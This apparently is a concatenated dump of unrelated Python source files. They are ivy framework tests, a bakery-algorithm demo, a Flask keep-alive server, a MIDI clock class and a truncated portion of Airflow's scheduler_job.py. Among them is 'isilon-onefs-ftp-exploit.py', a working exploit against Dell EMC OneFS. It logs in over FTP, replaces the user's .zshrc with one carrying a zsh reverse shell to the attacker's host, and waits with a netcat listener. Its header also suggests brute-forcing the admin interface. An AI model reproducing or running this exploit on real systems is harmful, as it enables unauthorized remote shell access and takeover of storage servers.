pytest.skip()
# store original framework string and unset
fw_str = ivy.current_framework_str()
ivy.unset_framework()
# set with explicit handle caught
ivy_exp = ivy.get_framework(fw_str)
assert ivy_exp.current_framework_str() == fw_str
# assert backend implemented function is accessible
assert 'array' in ivy_exp.__dict__
assert callable(ivy_exp.array)
# assert joint implemented function is also accessible
assert 'cache_fn' in ivy_exp.__dict__
assert callable(ivy_exp.cache_fn)
# set global ivy to numpy
ivy.set_framework('numpy')
# assert the explicit handle is still unchanged
assert ivy.current_framework_str() == 'numpy'
assert ivy_exp.current_framework_str() == fw_str
# unset global ivy from numpy
ivy.unset_framework()
def test_class_ivy_handles(dev, wrapped_mode, call):
if wrapped_mode:
# ToDo: get this test passing
pytest.skip()
if call is helpers.np_call:
# Numpy is the conflicting framework being tested against
pytest.skip()
class ArrayGen:
def __init__(self, ivyh):
self._ivy = ivyh
def get_array(self):
return self._ivy.array([0., 1., 2.])
# create instance
ag = ArrayGen(ivy.get_framework())
# create array from array generator
x = ag.get_array()
# verify this is not a numpy array
assert not isinstance(x, np.ndarray)
# change global framework to numpy
ivy.set_framework('numpy')
# create another array from array generator
x = ag.get_array()
# verify this is not still a numpy array
assert not isinstance(x, np.ndarray)
# einops_rearrange
@pytest.mark.parametrize(
"x_n_pattern_n_newx", [([[0., 1., 2., 3.]], 'b n -> n b', [[0.], [1.], [2.], [3.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_rearrange(x_n_pattern_n_newx, dtype, tensor_fn, dev, call):
# smoke test
x, pattern, new_x = x_n_pattern_n_newx
x = tensor_fn(x, dtype, dev)
ret = ivy.einops_rearrange(x, pattern)
true_ret = einops.rearrange(ivy.to_native(x), pattern)
# type test
assert ivy.is_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# compilation test
if call is helpers.torch_call:
# torch jit cannot compile **args
pytest.skip()
if not ivy.array_mode():
helpers.assert_compilable(ivy.einops_rearrange)
# einops_reduce
@pytest.mark.parametrize(
"x_n_pattern_n_red_n_newx", [([[0., 1., 2., 3.]], 'b n -> b', 'mean', [1.5])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_reduce(x_n_pattern_n_red_n_newx, dtype, tensor_fn, dev, call):
# smoke test
x, pattern, reduction, new_x = x_n_pattern_n_red_n_newx
x = tensor_fn(x, dtype, dev)
ret = ivy.einops_reduce(x, pattern, reduction)
true_ret = einops.reduce(ivy.to_native(x), pattern, reduction)
# type test
assert ivy.is_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# compilation test
if call is helpers.torch_call:
# torch jit cannot compile **args
pytest.skip()
if not ivy.array_mode():
helpers.assert_compilable(ivy.einops_reduce)
# einops_repeat
@pytest.mark.parametrize(
"x_n_pattern_n_al_n_newx", [([[0., 1., 2., 3.]], 'b n -> b n c', {'c': 2},
[[[0., 0.], [1., 1.], [2., 2.], [3., 3.]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_repeat(x_n_pattern_n_al_n_newx, dtype, tensor_fn, dev, call):
# smoke test
x, pattern, axes_lengths, new_x = x_n_pattern_n_al_n_newx
x = tensor_fn(x, dtype, dev)
ret = ivy.einops_repeat(x, pattern, **axes_lengths)
true_ret = einops.repeat(ivy.to_native(x), pattern, **axes_lengths)
# type test
assert ivy.is_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# compilation test
if call is helpers.torch_call:
# torch jit cannot compile **args
pytest.skip()
if not ivy.array_mode():
helpers.assert_compilable(ivy.einops_repeat)
# profiler
def test_profiler(dev, call):
# ToDo: find way to prevent this test from hanging when run alongside other tests in parallel
# log dir
this_dir = os.path.dirname(os.path.realpath(__file__))
log_dir = os.path.join(this_dir, '../log')
# with statement
with ivy.Profiler(log_dir):
a = ivy.ones([10])
b = ivy.zeros([10])
a + b
if call is helpers.mx_call:
time.sleep(1) # required by MXNet for some reason
# start and stop methods
profiler = ivy.Profiler(log_dir)
profiler.start()
a = ivy.ones([10])
b = ivy.zeros([10])
a + b
profiler.stop()
if call is helpers.mx_call:
time.sleep(1) # required by MXNet for some reason
# container types
def test_container_types(dev, call):
cont_types = ivy.container_types()
assert isinstance(cont_types, list)
for cont_type in cont_types:
assert hasattr(cont_type, 'keys')
assert hasattr(cont_type, 'values')
assert hasattr(cont_type, 'items')
def test_inplace_arrays_supported(dev, call):
cur_fw = ivy.current_framework_str()
if cur_fw in ['numpy', 'mxnet', 'torch']:
assert ivy.inplace_arrays_supported()
elif cur_fw in ['jax', 'tensorflow']:
assert not ivy.inplace_arrays_supported()
else:
raise Exception('Unrecognized framework')
def test_inplace_variables_supported(dev, call):
cur_fw = ivy.current_framework_str()
if cur_fw in ['numpy', 'mxnet', 'torch', 'tensorflow']:
assert ivy.inplace_variables_supported()
elif cur_fw in ['jax']:
assert not ivy.inplace_variables_supported()
else:
raise Exception('Unrecognized framework')
@pytest.mark.parametrize(
"x_n_new", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_inplace_update(x_n_new, tensor_fn, dev, wrapped_mode, call):
if wrapped_mode:
# ToDo: add support for inplace updates in wrapped mode
pytest.skip()
x_orig, new_val = x_n_new
if call is helpers.mx_call and isinstance(x_orig, Number):
# MxNet supports neither 0-dim variables nor 0-dim inplace updates
pytest.skip()
x_orig = tensor_fn(x_orig, 'float32', dev)
new_val = tensor_fn(new_val, 'float32', dev)
if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
(tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
x = ivy.inplace_update(x_orig, new_val)
assert id(x) == id(x_orig)
assert np.allclose(ivy.to_numpy(x), ivy.to_numpy(new_val))
return
pytest.skip()
@pytest.mark.parametrize(
"x_n_dec", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_inplace_decrement(x_n_dec, tensor_fn, dev, wrapped_mode, call):
if wrapped_mode:
# ToDo: add support for inplace decrements in wrapped mode
pytest.skip()
x_orig, dec = x_n_dec
if call is helpers.mx_call and isinstance(x_orig, Number):
# MxNet supports neither 0-dim variables nor 0-dim inplace updates
pytest.skip()
x_orig = tensor_fn(x_orig, 'float32', dev)
dec = tensor_fn(dec, 'float32', dev)
new_val = x_orig - dec
if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
(tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
x = ivy.inplace_decrement(x_orig, dec)
assert id(x) == id(x_orig)
assert np.allclose(ivy.to_numpy(new_val), ivy.to_numpy(x))
return
pytest.skip()
@pytest.mark.parametrize(
"x_n_inc", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_inplace_increment(x_n_inc, tensor_fn, dev, wrapped_mode, call):
if wrapped_mode:
# ToDo: add support for inplace increments in wrapped mode
pytest.skip()
x_orig, inc = x_n_inc
if call is helpers.mx_call and isinstance(x_orig, Number):
# MxNet supports neither 0-dim variables nor 0-dim inplace updates
pytest.skip()
x_orig = tensor_fn(x_orig, 'float32', dev)
inc = tensor_fn(inc, 'float32', dev)
new_val = x_orig + inc
if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
(tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
x = ivy.inplace_increment(x_orig, inc)
assert id(x) == id(x_orig)
assert np.allclose(ivy.to_numpy(new_val), ivy.to_numpy(x))
return
pytest.skip()
|
bakery_algorithm.py
|
from time import sleep
from random import randint
from threading import Thread
LOWEST_PRIORITY = 0
NUM_THREADS = 100
def lock(tid, entering, tickets):
# The entering list is required for the edge case where two threads end up
# getting the same ticket value, and one with lower prioirty (higher tid)
# ends up going to the critical section first. Then when the higher priority
# thread runs it will also get into the critical section.
entering[tid] = True
tickets[tid] = max(tickets) + 1
entering[tid] = False
for j in range(len(entering)):
while entering[j]:
thread_yield()
while tickets[j] != 0 and (tickets[tid], tid) > (tickets[j], j):
thread_yield()
def unlock(tid):
tickets[tid] = LOWEST_PRIORITY
def compute(tid, entering, tickets):
lock(tid, entering, tickets)
# Critical section
print 'hello world'
unlock(tid)
def thread_yield():
sleep(0.1)
if __name__ == '__main__':
entering = [False] * NUM_THREADS
tickets = [LOWEST_PRIORITY] * NUM_THREADS
threads = [Thread(target=compute, args=(tid, entering, tickets))
for tid in range(NUM_THREADS)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
|
isilon-onefs-ftp-exploit.py
|
#!/usr/bin/env python
#
# Exploit name : isilon-onefs-ftp-exploit.py
# Created date : 9/21/18
# Submit Date : 10/10/18
# Author : wetw0rk
# Header Wizard BOI : loganbest
# Python version : 2.7
# Brute Force Script: https://github.com/wetw0rk/Exploit-Development/blob/master/DELL%20EMC%20OneFS%20Storage%20Administration%20%3C%208.1.2.0/isilon-onefs-brute.py
# Vendor Homepage : https://www.dellemc.com/en-us/storage/isilon/onefs-operating-system.htm
# Software Link : https://downloads.emc.com/emc-com/usa/Isilon/EMC_Isilon_OneFS_8.1.2.0_Simulator.zip
# Tested on : DELL EMC OneFS Storage Administration 8.1.2.0
#
# Greetz: Hima (thanks for helping me think of .bashrc), Fr13ndzSec, AbeSnowman, Berserk, Neil
#
# [------------ Timeline ------------]
# 9/21/18 - Contacted Dell PSIRT
# 9/25/18 - Sent POC code
# 10/9/18 - Responded with "not considered a vulnerability"
#
# Description :
# To exploit this vulnerability first you must gain access to the administrative
# interface on 8080 (note no lockouts so you can bruteforce E Z). Once in enable
# FTP like so:
# -> Protocols -> FTP Settings -> Enable the service and transfers -> With that done, exploit!
#
# Since you're dropped in the user home directory and not a secluded FTP directory
# you can inject into .zshrc, however as dell stated you can access other files on
# the system as well....
#
import os
import sys
import socket
import threading
RED = "\033[1m\033[31m[-]\033[0m"
BLUE = "\033[1m\033[94m[*]\033[0m"
GREEN = "\033[1m\033[92m[+]\033[0m"
def background_server(lhost):
global check
fd = open(".zshrc", 'w')
host = "0.0.0.0"
port = 50121
sock = socket.socket(
socket.AF_INET,
socket.SOCK_STREAM
)
sock.bind((host, port))
sock.listen(5)
print("%s listening on %s:%s" % (BLUE, host,port))
while True:
conn, addr = sock.accept()
if check != 1:
zshrc_file = conn.recv(4096)
print("%s generating .zshrc payload" % BLUE)
fd.write(zshrc_file)
# msfvenom -a cmd --platform unix -p cmd/unix/reverse_zsh LHOST=192.168.245.136 LPORT=443 -f raw
fd.write("zsh -c 'zmodload zsh/net/tcp && ztcp %s 443 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY' &\n" % lhost)
fd.close()
else:
with open('.zshrc', 'r') as myfile:
data=myfile.read()
conn.send(data)
try:
rhost = sys.argv[1]
rport = int(sys.argv[2])
lhost = sys.argv[3]
username = sys.argv[4]
password = sys.argv[5]
except:
print("Usage: ./%s <rhost> <rport> <lhost> <username> <password>" % sys.argv[0])
print("Example: ./%s 192.168.245.3 21 192.168.245.136 admin admin" % sys.argv[0])
exit(0)
check = 0 # start a background server for download+uploads
server_thread = threading.Thread(target=background_server, args=(lhost,))
server_thread.start()
# create a socket for the client sending the commands
print("%s connecting to %s:%s" % (BLUE, rhost, rport))
csock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
csock.connect((rhost, rport))
csock.recv(4096)
print("%s performing login to OneFS using %s:%s" % (BLUE, username, password))
csock.send("USER %s\r\n" % username)
csock.recv(4096)
csock.send("PASS %s\r\n" % password)
csock.recv(4096)
print("%s login was successful downloading .zshrc" % GREEN)
csock.send("PORT %s,195,201\r\n" % lhost.replace(".", ",")) # have port on 50121
csock.recv(4096)
csock.send("RETR .zshrc\r\n")
csock.recv(4096)
csock.send("RNFR .zshrc\r\n")
csock.recv(4096)
print("%s renaming remote .zshrc to .backup" % GREEN)
csock.send("RNTO .backup\r\n")
csock.recv(4096)
check = 1
print("%s uploading payload to target host" % GREEN)
csock.send("PORT %s,195,201\r\n" % lhost.replace(".", ",")) # have port on 50121
csock.recv(4096)
csock.send("TYPE I\r\n")
csock.recv(4096)
csock.send("STOR .zshrc\r\n")
print("%s exploitation complete waiting for %s to login" % (GREEN, username))
os.system("nc -lvp 443")
csock.close()
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def main():
return "Your bot is alive!"
def run():
app.run(host="0.0.0.0", port=8080)
def keep_alive():
server = Thread(target=run)
server.start()
|
clock.py
|
from ..constants import DEFAULT_TEMPO, DEFAULT_TICKS_PER_BEAT, MIN_CLOCK_DELAY_WARNING_TIME
from ..util import make_clock_multiplier
import time
import logging
import threading
log = logging.getLogger(__name__)
#----------------------------------------------------------------------
# A Clock is relied upon to generate accurate tick() events every
# fraction of a note. it should handle millisecond-level jitter
# internally - ticks should always be sent out on time!
#
# Period, in seconds, corresponds to a 24th crotchet (1/96th of a bar),
# as per MIDI
#----------------------------------------------------------------------
class Clock:
def __init__(self,
clock_target=None,
tempo=DEFAULT_TEMPO,
ticks_per_beat=DEFAULT_TICKS_PER_BEAT):
self.clock_target = clock_target
self.tick_duration_seconds = None
self.tick_duration_seconds_orig = None
self._tempo = tempo
self.ticks_per_beat = ticks_per_beat
self.warpers = []
self.accelerate = 1.0
self.thread = None
self.running = False
target_ticks_per_beat = self.clock_target.ticks_per_beat if self.clock_target else ticks_per_beat
self.clock_multiplier = make_clock_multiplier(target_ticks_per_beat, self.ticks_per_beat)
def _calculate_tick_duration(self):
self.tick_duration_seconds = 60.0 / (self.tempo * self.ticks_per_beat)
self.tick_duration_seconds_orig = self.tick_duration_seconds
def get_ticks_per_beat(self):
return self._ticks_per_beat
def set_ticks_per_beat(self, ticks_per_beat):
self._ticks_per_beat = ticks_per_beat
self._calculate_tick_duration()
ticks_per_beat = property(get_ticks_per_beat, set_ticks_per_beat)
def get_tempo(self):
return self._tempo
def set_tempo(self, tempo):
self._tempo = tempo
self._calculate_tick_duration()
tempo = property(get_tempo, set_tempo)
def background(self):
""" Run this Timeline in a background thread. """
self.thread = threading.Thread(target=self.run)
self.thread.setDaemon(True)
self.thread.start()
def run(self):
clock0 = clock1 = time.time() * self.accelerate
#------------------------------------------------------------------------
# Allow a tick to elapse before we call tick() for the first time
# to keep Warp patterns in sync
#------------------------------------------------------------------------
self.running = True
while self.running:
if clock1 - clock0 >= (2.0 * self.tick_duration_seconds):
delay_time = (clock1 - clock0 - self.tick_duration_seconds * 2)
if delay_time > MIN_CLOCK_DELAY_WARNING_TIME:
log.warning("Clock: Timer overflowed (late by %.3fs)" % delay_time)
while clock1 - clock0 >= self.tick_duration_seconds:
#------------------------------------------------------------------------
# Time for a tick.
# Use while() because multiple ticks might need to be processed if the
# clock has overflowed.
#------------------------------------------------------------------------
ticks = next(self.clock_multiplier)
for tick in range(ticks):
self.clock_target.tick()
clock0 += self.tick_duration_seconds
self.tick_duration_seconds = self.tick_duration_seconds_orig
for warper in self.warpers:
warp = next(warper)
#------------------------------------------------------------------------
# map [-1..1] to [0.5, 2]
# - so -1 doubles the tempo, +1 halves it
#------------------------------------------------------------------------
warp = pow(2, warp)
self.tick_duration_seconds *= warp
time.sleep(0.0001)
clock1 = time.time() * self.accelerate
def stop(self):
self.running = False
def warp(self, warper):
self.warpers.append(warper)
def unwarp(self, warper):
self.warpers.remove(warper)
class DummyClock (Clock):
"""
Clock subclass used in testing, which ticks at the highest rate possible.
"""
def run(self):
while True:
self.clock_target.tick()
|
scheduler_job.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from datetime import timedelta
from time import sleep
from past.builtins import basestring
import six
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.orm.session import make_transient
from airflow.configuration import conf
from airflow import executors, models, settings
from airflow.exceptions import AirflowException
from airflow.jobs.base_job import BaseJob
from airflow.models import DagRun, SlaMiss, errors
from airflow.settings import Stats
from airflow.ti_deps.dep_context import DepContext, SCHEDULEABLE_STATES, SCHEDULED_DEPS
from airflow.ti_deps.deps.pool_slots_available_dep import STATES_TO_COUNT_AS_RUNNING
from airflow.utils import asciiart, helpers, timezone
from airflow.utils.dag_processing import (AbstractDagFileProcessor,
DagFileProcessorAgent,
SimpleDag,
SimpleDagBag,
SimpleTaskInstance,
list_py_file_paths)
from airflow.utils.db import provide_session
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.state import State
class DagFileProcessor(AbstractDagFileProcessor, LoggingMixin):
"""Helps call SchedulerJob.process_file() in a separate process.
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: unicode
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_id_white_list: If specified, only look at these DAG ID's
:type dag_id_white_list: list[unicode]
:param zombies: zombie task instances to kill
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(self, file_path, pickle_dags, dag_id_white_list, zombies):
self._file_path = file_path
# The process that was launched to process the given .
self._process = None
self._dag_id_white_list = dag_id_white_list
self._pickle_dags = pickle_dags
self._zombies = zombies
# The result of Scheduler.process_file(file_path).
self._result = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time = None
# This ID is use to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessor.class_creation_counter
DagFileProcessor.class_creation_counter += 1
@property
def file_path(self):
return self._file_path
@staticmethod
def _run_file_processor(result_channel,
file_path,
pickle_dags,
dag_id_white_list,
thread_name,
zombies):
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: unicode
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_id_white_list: if specified, only examine DAG ID's that are
in this list
:type dag_id_white_list: list[unicode]
:param thread_name: the name to use for the process that is launched
:type thread_name: unicode
:return: the process that was launched
:rtype: multiprocessing.Process
:param zombies: zombie task instances to kill
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
"""
# This helper runs in the newly created process
log = logging.getLogger("airflow.processor")
stdout = StreamLogWriter(log, logging.INFO)
stderr = StreamLogWriter(log, logging.WARN)
set_context(log, file_path)
setproctitle("airflow scheduler - DagFileProcessor {}".format(file_path))
try:
# redirect stdout/stderr to log
sys.stdout = stdout
sys.stderr = stderr
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
start_time = time.time()
log.info("Started process (PID=%s) to work on %s",
os.getpid(), file_path)
scheduler_job = SchedulerJob(dag_ids=dag_id_white_list, log=log)
result = scheduler_job.process_file(file_path,
zombies,
pickle_dags)
result_channel.send(result)
end_time = time.time()
log.info(
"Processing %s took %.3f seconds", file_path, end_time - start_time
)
except Exception:
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
result_channel.close()
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
def start(self):
"""
Launch the process and start processing the DAG.
"""
self._parent_channel, _child_channel = multiprocessing.Pipe()
self._process = multiprocessing.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
self.file_path,
self._pickle_dags,
self._dag_id_white_list,
"DagFileProcessor{}".format(self._instance_id),
self._zombies
),
name="DagFileProcessor{}-Process".format(self._instance_id)
)
self._start_time = timezone.utcnow()
self._process.start()
def kill(self):
"""
Kill the process launched to process the file, and ensure consistent state.
"""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
# The queue will likely get corrupted, so remove the reference
self._result_queue = None
self._kill_process()
def terminate(self, sigkill=False):
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
self._process.join(5)
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self):
if self._process.is_alive():
self.log.warning("Killing PID %s", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
@property
def pid(self):
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self):
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self):
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
pass
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self):
"""
:return: result of running SchedulerJob.process_file()
:rtype: airflow.utils.dag_processing.SimpleDag
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self):
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
class SchedulerJob(BaseJob):
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: unicode
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[unicode]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: unicode
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param run_duration: how long to run (in seconds) before exiting
:type run_duration: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {
'polymorphic_identity': 'SchedulerJob'
}
heartrate = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
dag_id=None,
dag_ids=None,
subdir=settings.DAGS_FOLDER,
num_runs=conf.getint('scheduler', 'num_runs', fallback=-1),
processor_poll_interval=conf.getfloat(
'scheduler', 'processor_poll_interval', fallback=1),
run_duration=None,
do_pickle=False,
log=None,
*args, **kwargs):
"""
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: unicode
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[unicode]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: unicode
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
# for BaseJob compatibility
self.dag_id = dag_id
self.dag_ids = [dag_id] if dag_id else []
if dag_ids:
self.dag_ids.extend(dag_ids)
self.subdir = subdir
self.num_runs = num_runs
self.run_duration = run_duration
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super(SchedulerJob, self).__init__(*args, **kwargs)
self.max_threads = conf.getint('scheduler', 'max_threads')
if log:
self._log = log
self.using_sqlite = False
if 'sqlite' in conf.get('core', 'sql_alchemy_conn'):
self.using_sqlite = True
self.max_tis_per_query = conf.getint('scheduler', 'max_tis_per_query')
if run_duration is None:
self.run_duration = conf.getint('scheduler',
'run_duration')
self.processor_agent = None
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame):
"""
Helper method to clean up processor_agent to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def is_alive(self, grace_multiplier=None):
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super(SchedulerJob, self).is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING and
(timezone.utcnow() - self.latest_heartbeat).seconds < scheduler_health_check_threshold
)
@provide_session
def manage_slas(self, dag, session=None):
"""
Finding all tasks that have SLAs defined, and sending alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
if not any([isinstance(ti.sla, timedelta) for ti in dag.tasks]):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
# This is a temporary fix for 1.10.4 release.
# Background: AIRFLOW-4297
# TODO: refactor manage_slas() to handle related issues.
if dag._schedule_interval is None:
self.log.info("SLA check for DAGs with schedule_interval 'None'/'@once' are "
"skipped in 1.10.4, due to related refactoring going on.")
return
TI = models.TaskInstance
sq = (
session
.query(
TI.task_id,
func.max(TI.execution_date).label('max_ti'))
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(or_(
TI.state == State.SUCCESS,
TI.state == State.SKIPPED))
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id).subquery('sq')
)
max_tis = session.query(TI).filter(
TI.dag_id == dag.dag_id,
TI.task_id == sq.c.task_id,
TI.execution_date == sq.c.max_ti,
).all()
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
dttm = ti.execution_date
if isinstance(task.sla, timedelta):
dttm = dag.following_schedule(dttm)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(SlaMiss(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=dttm,
timestamp=ts))
dttm = dag.following_schedule(dttm)
session.commit()
slas = (
session
.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa pylint: disable=singleton-comparison
.all()
)
if slas:
sla_dates = [sla.execution_date for sla in slas]
qry = (
session
.query(TI)
.filter(
TI.state != State.SUCCESS,
TI.execution_date.in_(sla_dates),
TI.dag_id == dag.dag_id
).all()
)
blocking_tis = []
for ti in qry:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([
sla.task_id + ' on ' + sla.execution_date.isoformat()
for sla in slas])
blocking_task_list = "\n".join([
ti.task_id + ' on ' + ti.execution_date.isoformat()
for ti in blocking_tis])
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info(' --------------> ABOUT TO CALL SLA MISS CALL BACK ')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas,
blocking_tis)
notification_sent = True
except Exception:
self.log.exception("Could not call sla_miss_callback for DAG %s",
dag.dag_id)
email_content = """\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n<code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}\n{bug}<code></pre>
""".format(task_list=task_list, blocking_task_list=blocking_task_list,
bug=asciiart.bug)
emails = set()
for task in dag.tasks:
if task.email:
if isinstance(task.email, basestring):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(
emails,
"[airflow] SLA miss on DAG=" + dag.dag_id,
email_content)
email_sent = True
notification_sent = True
except Exception:
self.log.exception("Could not send SLA Miss email notification for"
" DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
if email_sent:
sla.email_sent = True
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session, dagbag):
"""
For the DAGs in the given DagBag, record any associated import errors and clears
errors for files that no longer have them. These are usually displayed through the
